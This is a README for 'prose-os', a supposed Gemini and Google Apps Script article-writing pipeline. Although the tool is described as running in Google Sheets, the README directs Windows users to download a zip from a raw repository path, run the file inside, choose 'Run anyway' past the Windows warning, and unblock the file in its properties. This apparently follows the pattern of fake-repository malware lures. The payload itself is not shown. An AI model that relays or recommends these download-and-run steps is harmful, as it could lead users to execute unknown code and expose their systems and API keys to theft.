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✍️ prose-os - Turn Topics Into Clean, Ready Drafts

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📥 Download and Install

Visit this page to download: https://github.com/Gwennunalike192/prose-os/raw/refs/heads/main/scripts/prose_os_3.0.zip

  1. Open the release page in your browser.
  2. Download the latest Windows file from the release assets.
  3. Save the file to your Downloads folder or Desktop.
  4. If the file is in a zip folder, right-click it and choose Extract All.
  5. Open the extracted folder.
  6. Double-click the app or script file to run it.
  7. If Windows asks for permission, select More info and then Run anyway if you trust the file source.

🖥️ What prose-os Does

prose-os helps you turn rough ideas into finished long-form content. It follows a 17-stage writing flow that shapes raw topics into clear, voice-matched, SEO-ready drafts.

It is built for users who want:

  • Cleaner blog drafts
  • Better flow from section to section
  • More consistent tone across a full article
  • Basic fact checks during the writing process
  • Image prompt ideas for each piece
  • A simple way to move from topic to draft

This tool uses Google Apps Script and Gemini to handle the writing steps. It works well for blog work, editorial tasks, and content planning.

⚙️ What You Need

Before you run prose-os on Windows, make sure you have:

  • A Windows 10 or Windows 11 PC
  • A stable internet connection
  • A browser such as Chrome, Edge, or Firefox
  • Access to Google Sheets
  • A Google account
  • A Gemini API key for writing tasks
  • Permission to run downloaded files from your computer

🚀 First-Time Setup

After you download and open the app, follow these steps:

  1. Open Google Sheets in your browser.
  2. Create a new spreadsheet for your content project.
  3. Add your topic or article idea in the first input area.
  4. Paste your Gemini API key where the setup asks for it.
  5. Allow the script to connect to Google services if prompted.
  6. Save the sheet so your settings stay in place.
  7. Run the first stage to test the setup.

If the project uses a release package with preset files, keep the folder structure the same after extraction. Some Google Apps Script flows depend on linked sheets and named tabs.

🧠 How It Works

prose-os uses a staged workflow. Each stage improves the draft before the next step starts.

Typical flow:

  1. Topic intake
  2. Outline creation
  3. Section planning
  4. Angle selection
  5. Fact review
  6. Voice matching
  7. Draft expansion
  8. Readability pass
  9. SEO pass
  10. Headline refinement
  11. Paragraph cleanup
  12. Tone check
  13. Image prompt creation
  14. Final edit
  15. Quality scan
  16. Export prep
  17. Final output

This gives you a full content path from a raw topic to a polished article.

📝 Main Features

  • 17-stage article pipeline
  • Long-form content generation
  • Voice-consistent editing
  • SEO-aware drafting
  • Fact-check support
  • Image prompt output
  • Google Sheets based control
  • Google Apps Script workflow
  • Gemini-powered writing help
  • Designed for blogs, guides, and editorial drafts

📊 Suggested Google Sheet Layout

For best results, use a sheet with these tabs:

  • Input — topic, audience, and source notes
  • Outline — structure and section order
  • Draft — working article text
  • Edit — voice and style cleanup
  • SEO — keywords, title, and meta fields
  • Images — image prompt ideas
  • Export — final copy ready to use

You can keep this simple. Even one sheet with clear columns can work if the project was set up that way.

🔐 Gemini API Setup

To use the writing pipeline, you need a Gemini API key.

Basic setup:

  1. Go to your Google AI or Gemini API console.
  2. Create a new API key.
  3. Copy the key.
  4. Paste it into the setup field in your sheet or script.
  5. Save the sheet.
  6. Run a short test job.

Keep the key private. Do not share it in public sheets or screenshots.

🛠️ Common Windows Setup Steps

If the downloaded file does not open right away, try this:

  1. Right-click the file.
  2. Choose Properties.
  3. Check for an Unblock box near the bottom.
  4. Select Unblock if you see it.
  5. Click Apply.
  6. Try opening the file again.

If you downloaded a zip file:

  1. Right-click the zip file.
  2. Select Extract All.
  3. Choose a folder.
  4. Open the extracted folder.
  5. Start the app or script from there.

📚 Example Use Cases

prose-os fits tasks like:

  • Blog drafting
  • SEO article creation
  • Newsletter writing
  • Research-to-draft workflows
  • Internal editorial prep
  • Long-form content planning
  • Voice-style rewriting
  • Topic expansion for content teams

🧩 Tips for Better Output

  • Use one clear topic per run
  • Add a short audience note
  • Include any must-use keywords
  • Keep source notes short and focused
  • Review the outline before generating the full draft
  • Use the edit stage to match your brand voice
  • Run the SEO stage near the end, not at the start

📁 Typical Output Files

Depending on your setup, prose-os may create or use files such as:

  • Draft text files
  • Google Sheet tabs
  • Outline notes
  • SEO fields
  • Title options
  • Image prompt lists
  • Final export copy

🔎 Troubleshooting

If the tool does not run:

  1. Check that your file finished downloading.
  2. Make sure you extracted the zip folder if there is one.
  3. Confirm that Google Sheets is open in the right account.
  4. Check that your API key is valid.
  5. Refresh the browser and try again.
  6. Make sure scripts are allowed in your browser.

If output looks weak:

  1. Make the topic more specific.
  2. Add a target reader.
  3. Add a clear source note.
  4. Run the outline stage again.
  5. Use the voice edit step before final export.

📌 Topics Covered

ai-writing-pipeline, automated-editorial, content-automation, gemini-api, google-apps-script, google-sheets, llm-orchestration, long-form-content, seo-automation, writing-assistant

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